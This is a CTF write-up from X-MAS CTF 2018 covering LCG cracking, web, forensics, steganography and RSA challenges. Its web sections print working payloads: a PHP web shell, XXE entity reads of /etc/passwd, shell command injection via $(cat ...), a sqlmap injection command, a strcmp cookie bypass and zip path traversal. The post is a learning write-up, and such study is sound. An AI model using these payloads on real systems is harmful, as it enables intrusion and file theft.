Aj Dumanhug
Dec 22, 2018
XMAS-CTF

X-MAS CTF is a week-long Capture The Flag competition created by the Romanian high-school CTF team HTsP (Hecării, Țuica și Păunii).
Our team, hackstreetboys, participated and managed to finish in 10th place out of 1378 teams.

XMAS CTF 2018 Scoreboard
Challenges ❤

Web/Crypto

This category was supposed to have only one challenge, Let’s Crack the Great lapland, but some participants managed to brute-force or guess the next value, so the authors added a second challenge, Let’s Crack the Greater lapland, which has to be solved with the intended solution.

Let’s Crack the Great lapland

“Psst, I got a task for you. There’s this monolith to which I need to get access, but I can’t get the numbers right. Can you help me? I pay well.” ~ A shady dealer gnome

Server: http://199.247.6.180:12000
Authors: Milkdrop + Gabies

Let’s Crack the Great lapland webpage

Let’s Crack the Greater lapland

“Hey, do you remember that monolith I had to get in last week? Now I stumbled upon something greater and shinier! Can you help me get access to this one?” ~ The same shady dealer gnome

Server: http://199.247.6.180:12006
Authors: Milkdrop + Gabies

Let’s Crack the Greater lapland webpage

Solution

By carefully observing the challenge title (Let’s Crack the Great lapland), we found out that this is about LCGs.

A Linear Congruential Generator (LCG) is an algorithm that yields a sequence of pseudo-randomized numbers calculated with a discontinuous piecewise linear equation.

The generator is defined by the recurrence relation x(n+1) = (a*x(n) + b) mod m, where x is the sequence of pseudorandom values, m is the modulus, a is the multiplier, and b is the increment.

The objective is to collect the first few numbers of the sequence from the webpage and use them to recover the modulus, multiplier, and increment.

By the way, thanks to mcm of the p4 team for creating a detailed blog post about cracking LCGs: https://tailcall.net/blog/cracking-randomness-lcgs/

To get the modulus, the following code was used (x is the list of consecutive values collected from the page; at least six are needed so that z has three entries):

from math import gcd

y = []  # differences between consecutive outputs
z = []  # determinants, each of which is a multiple of the modulus
for element in range(len(x) - 1):
    y.append(x[element + 1] - x[element])
for element in range(len(y) - 2):
    z.append(abs(y[element + 2] * y[element] - y[element + 1] ** 2))
m = gcd(gcd(z[0], z[1]), z[2])

To get the multiplier, the following code was used (invert is the modular inverse from gmpy2; it only exists when x[1] - x[0] is coprime to m):

from gmpy2 import invert

a = (x[2] - x[1]) * invert(x[1] - x[0], m) % m

To get the increment, the following code was used:

b = (x[1] - a * x[0]) % m

Once the modulus, multiplier, and increment are obtained, we can apply the recurrence to predict the next numbers of the monolith:

x(n+1) = (a*x(n) + b) mod m
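The whole procedure end to end, as an added example that is not part of the original writeup: it generates a short sequence from constructed parameters (m = 101, a = 7, b = 13, seed 5, chosen small so the arithmetic can be checked by hand), recovers the parameters from the first six outputs with the method above, and predicts the next value. It goes slightly beyond the snippets above by taking the gcd over every available determinant rather than just the first three, and by checking that the modular inverse exists; the function names lcg, crack_lcg and predict_next are my own.

```python
from functools import reduce
from math import gcd


def lcg(seed, a, b, m, count):
    """Return the first `count` outputs of x(n+1) = (a*x(n) + b) mod m after the seed."""
    outputs, x = [], seed
    for _ in range(count):
        x = (a * x + b) % m
        outputs.append(x)
    return outputs


def crack_lcg(x):
    """Recover (m, a, b) from consecutive outputs x; needs at least six values.

    Differences y[i] = x[i+1] - x[i] satisfy y[i+1] = a*y[i] (mod m), so every
    determinant y[i+2]*y[i] - y[i+1]**2 is a multiple of m.  Their gcd is m, or
    occasionally a small multiple of it, so verify the result by predicting a
    value you already know before trusting it.
    """
    if len(x) < 6:
        raise ValueError("need at least six consecutive outputs")
    y = [x[i + 1] - x[i] for i in range(len(x) - 1)]
    z = [abs(y[i + 2] * y[i] - y[i + 1] ** 2) for i in range(len(y) - 2)]
    m = reduce(gcd, z)
    if gcd(y[0], m) != 1:
        raise ValueError("x[1] - x[0] has no inverse mod m; use a different window")
    a = (y[1] * pow(y[0], -1, m)) % m   # pow(v, -1, m) is the modular inverse (Python 3.8+)
    b = (x[1] - a * x[0]) % m
    return m, a, b


def predict_next(x, m, a, b):
    """Apply the recurrence once more to get the value the monolith will show next."""
    return (a * x[-1] + b) % m


# Constructed sample: six outputs of a tiny LCG standing in for the values read from the page.
SAMPLE = lcg(seed=5, a=7, b=13, m=101, count=6)          # [48, 46, 32, 35, 56, 1]

if __name__ == "__main__":
    m, a, b = crack_lcg(SAMPLE)
    print("recovered m, a, b =", m, a, b)                # 101 7 13
    print("next value =", predict_next(SAMPLE, m, a, b))  # 20
```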

Flags

Let’s Crack the Great lapland
X-MAS{LCG_0n_7h3_LapL4nd_m0n0LiTh_1s_n0t_7ha7_s3cur3}

Let’s Crack the Greater lapland
X-MAS{Bru73_F0rc3_1s_gr34t_bu7_LCG_1s_b3tt3r___}


Web

Most of the challenges were fun, but there was one challenge that was not good at all, because you only needed to change the value of a parameter to get the flag.

GnomeArena: Rock Paper Scissors

This challenge was solved by my other teammate, either SymR or Ameer.

This new website is all the rage for every gnome in Lapland! How many games of Rock Paper Scissors can you win?

Server: http://199.247.6.180:12002
Author: Milkdrop

Solution

  • The website is a Rock, Paper, Scissors game, but I noticed that there’s a settings page that allows us to upload a file and modify our game name.
  • After analyzing the settings page, I learned that the GAME NAME is the FILE NAME of the PROFILE IMAGE, and that I can upload PHP files as the PROFILE IMAGE.
  • So I uploaded a PHP file with the following simple payload:
<?php system($_GET['cmd']); ?>

Flag: X-MAS{Ev3ry0ne_m0ve_aw4y_th3_h4ck3r_gn0m3_1s_1n_t0wn}

Gnome’s BU77ons

This challenge was solved by my other teammate, either SymR or Ameer.

Who wouldn’t enjoy pressing random buttons? Yeah, i guessed so! This time though, the bu77on isn’t random…

Server: http://199.247.6.180:12004
Author: Vlad

Solution

  • Just change the value of the button parameter from Click here boai to flag.

Flag: X-MAS{PhPs_A1n7_m4d3_f0r_bu77_0ns___:)}

Our Christmas Wishlist

We have all gathered round to write down our wishes and desires for this Christmas! Please don’t write anything mean, Santa will be reading this!

Server: http://199.247.6.180:12001
Author: Milkdrop

Solution

  • Based on the POST request, the data to be posted has the content type application/xml. Therefore, this challenge could be vulnerable to XML External Entity injection, also known as XXE.
  • Using the following payload, we were able to retrieve the passwd file:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<message>&xxe;</message>
Retrieving etc/passwd
  • Using the following payload (the php://filter wrapper base64-encodes the file so its content survives as plain XML text), we were able to obtain the flag:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.txt">
]>
<message>&xxe;</message>
Retrieving flag.txt

Flag: X-MAS{_The_Ex73rnal_Ent1t13$_W4n7_To__Jo1n_7he_p4r7y__700______}
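From the defending side, an added example (not part of the original writeup or the challenge code) of the check the wishlist endpoint was missing: it screens the raw XML body for a DOCTYPE or ENTITY declaration, which is what both payloads above rely on, and only then hands the document to the parser. The two payloads from the writeup and a benign wish are embedded as constructed inputs; the function names classify and read_wish are my own.

```python
import re
import xml.etree.ElementTree as ET

# Entities can only be declared inside a DOCTYPE, so refusing any DOCTYPE blocks
# external-entity reads (and entity-expansion bombs) before parsing starts.
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
_ENTITY = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def classify(xml_bytes):
    """Return 'entity', 'doctype' or 'ok' for an inbound XML body."""
    if _ENTITY.search(xml_bytes):
        return "entity"
    if _DOCTYPE.search(xml_bytes):
        return "doctype"
    return "ok"


def read_wish(xml_bytes):
    """Return the <message> text, or None if the document is rejected.

    The screen runs before the parser ever sees the bytes.  xml.etree does not
    fetch external entities on its own, but a parser-independent check is easier
    to audit and does not depend on a library's defaults staying safe.
    """
    if classify(xml_bytes) != "ok":
        return None
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return None
    return root.text if root.tag == "message" else None


# Constructed inputs: the two payloads used in the challenge and an honest wish.
PASSWD_PAYLOAD = (b'<?xml version="1.0" ?>\n<!DOCTYPE root [\n'
                  b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<message>&xxe;</message>')
FILTER_PAYLOAD = (b'<?xml version="1.0" ?>\n<!DOCTYPE root [\n'
                  b'<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.txt">\n'
                  b']>\n<message>&xxe;</message>')
HONEST_WISH = b'<?xml version="1.0" ?>\n<message>A new sled, please!</message>'

if __name__ == "__main__":
    for name, body in [("passwd", PASSWD_PAYLOAD), ("filter", FILTER_PAYLOAD), ("wish", HONEST_WISH)]:
        print(name, classify(body), repr(read_wish(body)))
```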

Santa’s Helper Mechagnome

One of our main production Mechagnomes is now malfunctioning. You have to access its control panel by directly messaging Helper Mechagnome#9926 (You can find him resting on our main discord server).

Get the restart codes, and restart it so that our toy factory can continue working!

Author: Milkdrop

Solution

  • The MechaGnome#9926 control panel accepts the following commands: help, joke, add, list, sendletter, and restart.
  • The only important commands are list, sendletter, and restart.
  • Executing the list command gives us these emails:
- randdev@santa.com 
- toyfactory@santa.com
- weaponsilo@santa.com
- commandcenter@santa.com
- test@santa.com
- LOLOLOL@santa.com
  • The sendletter command takes two parameters: email and message (sendletter email message).
  • After trying many payloads in the message parameter, the following command gave us the list of files in the control panel (the shell expands the * into the file names, which shows the message is passed to a shell unquoted):
    sendletter commandcenter@santa.com *
mecha.py robot_restart_codes.txt
  • Executing the following command gives us the content of robot_restart_codes.txt (command substitution runs cat on the server):
    sendletter commandcenter@santa.com $(cat robot_restart_codes.txt)
Cobalt Inc. MechaGnome Restart Codes:\r XJACO-10U4C-C091U-VNOAC-J2QCS
  • Executing restart XJACO-10U4C-C091U-VNOAC-J2QCS restarts the bot and gives us the flag.

Flag: X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}

Santa’s lucky number

This challenge was solved by my other teammate, either SymR or Ameer.

Come on! Santa’s lucky number is pretty predictable, don’t you think? ;)

Server: http://199.247.6.180:12005
Author: Vlad

Solution

  • Visiting the website greets us with an image of a book, 3 buttons, and a hint: Santa loves hiding his secrets on the page numbered as his lucky number :)
  • Clicking each button gives us a random hash.
  • Using Burp Suite Intruder, I sequentially requested page numbers from 0 to 5,000 and found that page number 1327 triggers our Grep Match option, which returns the flag.
Burp Intruder

Flag: X-MAS{W00pS_S0m30n3_73l1_S4n7a_h1s_c00k1eS_Ar3_BuRn1ng}

Santa’s No Password Login System

Ameer and I collaborated to solve this challenge. Ameer found that User-Agent is vulnerable to Blind SQL Injection.

We all know that Santa is quite an old man. He sometimes forgets things. Including his password.

Therefore, our high-tech gnomegineer department worked the whole last night to develop a new login system, that requires no passwords! Nifty.

Server: http://199.247.6.180:12003
Author: Milkdrop

Solution

  • The hint in the challenge is “You don’t seem to be using an official Computer from Santa’s Laboratory!”, which means we have to do something with the User-Agent header.
  • Adding ' or '1'='1 to the User-Agent changes “Access Denied!” to “Welcome!”.
  • Using sqlmap, we found that the User-Agent is vulnerable to boolean-based blind, error-based, and AND/OR time-based SQL injection.
  • The following command was executed to dump the flag from the database (the * in --user-agent marks the injection point for sqlmap):
sqlmap.py -u http://199.247.6.180:12003/ --user-agent="' *" --level=5 --risk=3 --dbms=mysql --dump
Dumping the flag.

Flag: X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}

Reindeers and cookies

Ameer solved this challenge because I fell asleep and forgot to submit the flag hihi.

You cannot cmp any cookie with Santa’s cookies.

Server: http://199.247.6.180:12008
Authors: Milkdrop + Vlad

Solution

  • There are two cookies on the website: one named adminpass and the other named cookiez.
  • The value of cookiez is base64-encoded three times; decoded, it reads {"id":"2","type":"guest"}.
  • I changed the value of cookiez to {"id":"1","type":"admin"} and encoded it three times.
  • Going back to the adminpass cookie, I just added [] to the name to make it adminpass[]. Why? Because PHP turns a parameter named like this into an array. Luckily, this challenge uses strcmp() to compare our cookie and checks the result against 0; given an array instead of a string, strcmp() returns NULL rather than an integer (in PHP 7; PHP 8 throws a TypeError instead), and under PHP’s loose comparison (type juggling) NULL == 0 is true.
    NULL == 0 will return true.
  • The final payload is this:
Cookie: adminpass[]=MyLittleCookie!; cookiez=WlhsS2NGcERTVFpKYWtWcFRFTktNR1ZZUW14SmFtOXBXVmRTZEdGWE5HbG1VVDA5Q2c9PQo=;

Flag: X-MAS{S4n74_L0v35__C00kiesss_And_Juggl1ng!}

Super Secure Siberian Vault

Ever wondered where Santa might keep his most personal secrets? In the most securized Siberian vault of course! Today, the concrete and steel facility has opened to the public, and you can now use it to safeguard your very own personal secrets too, just like Santa!

Pro Tip: You can upload archives to store multiple secrets at the same time.

Server: 199.247.6.180:12007

Solution

  • The tip (or hint) tells us that the file type we need to upload is an archive. It could be tar, xz, jar, rar, zip, etc.
  • I tried a lot of them just to determine which kind of archive I should use for this attack and decided to stick with zip to save time. Also, the vault accepts archives up to 2KB only.
  • I tried a zip symlink but had no success. Then I found this blog about directory traversal in archives. Basically, we can put directory traversal sequences in the file names inside the zip, and the PHP script writes the files to the traversed path when it decompresses the archive.
  • In the blog mentioned above, they wrote a python script (evilarc) that creates a zip file containing files whose names include directory traversal. Using this script, we were able to create the payload.
./evilarc.py hackstreetboys.php -p img -o unix -d 2
-p = Path to include in filename after traversal.
-o = OS platform for archive (you can choose either win or unix)
-d = Number of directories to traverse.

Flag: X-MAS{Z1pp3r_D0wn_S4nt4!_Y0ur_Secr3t5_4r3_n0w_0ur5}
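On the defending side, an added example (not the challenge’s or evilarc’s code) of the check the vault’s unpacking script was missing: it builds a small archive in memory with one honest entry and one traversal entry of the kind evilarc produces, and shows an extractor that resolves every entry path against the destination and refuses the whole archive if anything would land outside it (absolute names and symlink entries included). The function names unsafe_entries, check_archive, extract_safely and build_sample_archive are my own.

```python
import io
import os
import zipfile


def unsafe_entries(zf, dest):
    """Return the entry names in `zf` that would land outside `dest` once resolved."""
    root = os.path.realpath(dest)
    bad = []
    for info in zf.infolist():
        # A symlink entry (Unix mode bits live in the high 16 bits of external_attr)
        # could redirect later writes, so it is rejected outright.
        if (info.external_attr >> 16) & 0o170000 == 0o120000:
            bad.append(info.filename)
            continue
        # Joining an absolute name, or one with ../ segments, and resolving it
        # shows where the file would really be written.
        target = os.path.realpath(os.path.join(root, info.filename))
        if os.path.commonpath([root, target]) != root:
            bad.append(info.filename)
    return bad


def check_archive(zip_bytes, dest):
    """Open an in-memory archive and report its unsafe entries without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return unsafe_entries(zf, dest)


def extract_safely(zip_bytes, dest):
    """Extract only when every entry stays inside `dest`; return the rejected names.

    Python's zipfile already drops '..' segments during extractall(), so the
    traversal file would otherwise be written under dest with a renamed path; the
    explicit check instead refuses the whole archive and names the offending entry.
    """
    bad = check_archive(zip_bytes, dest)
    if not bad:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            zf.extractall(dest)
    return bad


def build_sample_archive(with_traversal=True):
    """Constructed archive: one honest secret, optionally plus an evilarc-style entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("secrets/wish.txt", "a new sled")
        if with_traversal:
            zf.writestr("../../img/hackstreetboys.php", "<?php echo 'not welcome'; ?>")
    return buf.getvalue()


if __name__ == "__main__":
    print("rejected:", check_archive(build_sample_archive(), "vault"))  # ['../../img/hackstreetboys.php']
```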


Others

MISC: Weird Transmission

This challenge was one of the hardest; only just over 20 teams managed to solve it, including ours.

We have intercepted a weird transmission coming from an unidentified radio station from the North Pole. Please decode it for us, it seems important.

transmission.mp3

Author: PinkiePie1189

Solution

  • Playing the audio file greets us with the voice of a man, but we cannot clearly understand him. Fortunately, reversing the audio helps us understand him and his message.
  • Transcribing the audio gives us this message:
Dear CTF player, you have exploited littlewho's binaries, deciphered Gabies' cryptography, hacked your way into Milkdrop's websites and done some forensic analysis with Googal, now another challenge awaits. The evil Grinch is holding Santa hostage in an undisclosed location, we don't know his exact position. With a nice elf has told us the coordinates of nearby points. The first one is located at
(511716656388765455430016138955706839007890052532, 1622805609316535864254436412730925222158623332074)
The second one is at
(390390142500834541752332649936545354218395003257, 176460719206642987153469086794475382972064519404)
And the last one is at
(608097554835704767294367078594102923662585120876, 195121033653477539025103641752423493583135321761)
He also told us that Santa's home will be located where the shape formed by these three points is in complete equilibrium. Good luck and Merry Christmas.
  • Plotting those coordinates on a world map gives us nothing, just a clear rabbit hole.
  • I requested a hint and they told me that this is a geometry challenge.
  • I quickly searched Google for formulas related to geometry and found the analytic geometry formula for the centroid, mainly because it uses the given coordinates of the three vertices of a triangle (the centroid is the point where a triangle balances, which matches the “complete equilibrium” wording).
  • The following is the final formula to calculate the centroid:
centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3)
  • The following simple Python script calculates the centroid of the coordinates given in the audio:
x1 = 511716656388765455430016138955706839007890052532
x2 = 390390142500834541752332649936545354218395003257
x3 = 608097554835704767294367078594102923662585120876
y1 = 1622805609316535864254436412730925222158623332074
y2 = 176460719206642987153469086794475382972064519404
y3 = 195121033653477539025103641752423493583135321761
# integer division keeps the exact value (in Python 3, / would return a float and lose precision)
centroid = ((x1 + x2 + x3) // 3, (y1 + y2 + y3) // 3)
print(centroid)
  • The result is (503401451241768254825571955828785038962956725555, 664795787392218796811003047092608032904607724413)
  • The centroid values above are in decimal (base 10); I converted each of them to hex (base 16) and then to ASCII to get the flag.

Flag: X-MAS{An4ly71c_G30m3try_S4v3d_Chr157m4s}
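The last two steps carried through in code, as an added example that is not part of the original writeup: it computes the centroid with exact integer arithmetic and then turns each coordinate into its big-endian bytes and decodes them as ASCII, with a guard for an odd-length hex string that the one-liner conversion would otherwise choke on. The centroid function takes any number of points (the mean of each coordinate), of which the triangle is the case used here; the names centroid, number_to_ascii and solve are my own.

```python
def centroid(points):
    """Integer centroid of the given (x, y) points: the mean of each coordinate.

    Integer division keeps the full 160-bit precision; Python 3's / would return a float.
    """
    n = len(points)
    return (sum(x for x, _ in points) // n, sum(y for _, y in points) // n)


def number_to_ascii(value):
    """Interpret a big integer as big-endian bytes and decode them as ASCII text."""
    hexed = format(value, "x")
    if len(hexed) % 2:            # a leading zero nibble would otherwise be dropped
        hexed = "0" + hexed
    return bytes.fromhex(hexed).decode("ascii")


# The three points transcribed from the transmission.
POINTS = [
    (511716656388765455430016138955706839007890052532, 1622805609316535864254436412730925222158623332074),
    (390390142500834541752332649936545354218395003257, 176460719206642987153469086794475382972064519404),
    (608097554835704767294367078594102923662585120876, 195121033653477539025103641752423493583135321761),
]


def solve(points=POINTS):
    """Centroid, then x and y decoded as text and joined: the first half and second half of the flag."""
    cx, cy = centroid(points)
    return number_to_ascii(cx) + number_to_ascii(cy)


if __name__ == "__main__":
    print(centroid(POINTS))
    print(solve())
```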

FORENSICS: Hidden in almost plain sight

My teammate hightail and I solved this challenge. At first, we thought it would be easy because you would just do some simple forensics on a picture, but it turned out to be a steganography challenge.

A strange file was sent to Santa’s email address and he is puzzled. Help him find what’s wrong with the file and you can keep any flag you find in the process.

Solution

  • A file named celebration was given in the challenge.
  • After checking the header of the file, I noticed a familiar hex signature.
hex signature of Celebration
  • The 2nd and 3rd bytes of the file are missing, but I already knew this is a PNG file because 89 XX XX 47 0d 0a 1a 0a is the hex signature of PNG.
  • Adding 50 4E as the 2nd and 3rd bytes gives us this image.
Celebration.png
  • I wasted too much time trying different steg tools on this challenge, so I asked for a hint and they told me that I needed to adjust something in the image.
  • Using TweakPNG, I edited the height of the image in its IHDR chunk (rows stored past the declared height are simply never rendered) and finally obtained the flag.
Flag

Flag: X-MAS{who_knows_wh3re_s4anta_hid3s_the_g1fts}

CRYPTO: Special Christmas Wishlist

My teammate hawkcurry (Legend in Crypto) solved this and I decided to give it a shot (lol) ‘coz I wanna learn crypto (but it’s hard).

While Santa was looking through the wishlists of the children all around the world, he came across a very strange looking one. Help Santa decode the letter in order to fulfill the wishes of this child.

(Flag is Non-Standard)
wishlist.png

UPDATE: flag is lowercase!
Author: Gabies

Solution

  • My teammate hawkcurry told us that the 2nd line from the bottom reads “the flag is”.
  • Using that hint, I mapped the symbols of the 2nd line from the bottom to letters. Then I started working out the other symbols with the help of the known ones.
Substitution

Flag: X-MAS{youaresogoodatsubstitutionciphers}

MISC/CRYPTO: Unown Gift

We, hackstreetboys, collaborated to solve this challenge.

Oh, how sweet, you’ve just received a gift from someone! Sadly, you can’t really wrap your head around how it’s supposed to be opened…

UnownGift

Authors: Milkdrop + Gabies + PinkiePie1189

Solution

  • This challenge gave us a file. Based on its content, the authors XORed the file.
  • Using xortool, we brute-forced the file with all 256 possible single-byte keys and found out that it was XORed with 0xFF.
xortool -b UnownGift
  • After brute-forcing, we ran file * and discovered something interesting: a Game Boy Advance ROM image.
file *
  • We grabbed the hex signature 7f00 00ea 24ff ae51 699a a221 3d84 820a of the file and searched Google for its file extension.
gba
  • The file extension is .gba, and to open the file we need an emulator. We found the Boycott Advance emulator and used it to make the game work.
Pokemon!
  • Then, when we tried to leave the town, Prof. Oak approached our character and took us to his lab.
Prof. Oak Lab
  • Prof. Oak introduced us to 3 Poké Balls containing different Pokémon.
  • Each Pokémon has its own weird name.
Pokemons
  • Then we noticed that the variables/parameters n, e, and c are somehow related to RSA.
  • We confirmed this after checking the email on the computer.
Email
  • The hint is Rapid Secure Alternoflux keys = RSA keys.
  • So we copied the values of n, e, and c into our script and solved the RSA to capture the flag.
Flag!

Flag: X-MAS{Wh4t_4n_un3xp3ct3d_chr1stm45_pr3s3nt}


First of all, X-MAS CTF 2018 was really challenging and fun because the challenges were surprisingly well built.

Also, I’d like to say that I am proud of my teammates because they spent some of their time this holiday season solving challenges in Pwn, Web, Forensics, Misc, Crypto, and Reverse Engineering.

Finally, I hope you learned something on this blog. As always folks, thank you for reading!!!


Update: My teammate hawkcurry published his writeup for Crypto challenges. Read on: https://github.com/pberba/ctf-solutions/tree/master/20181223_xmasctf

hackstreetboys

hackstreetboys aka [hsb] is a CTF team from the Philippines

Aj Dumanhug

Written by

PSM in Cybersecurity Student
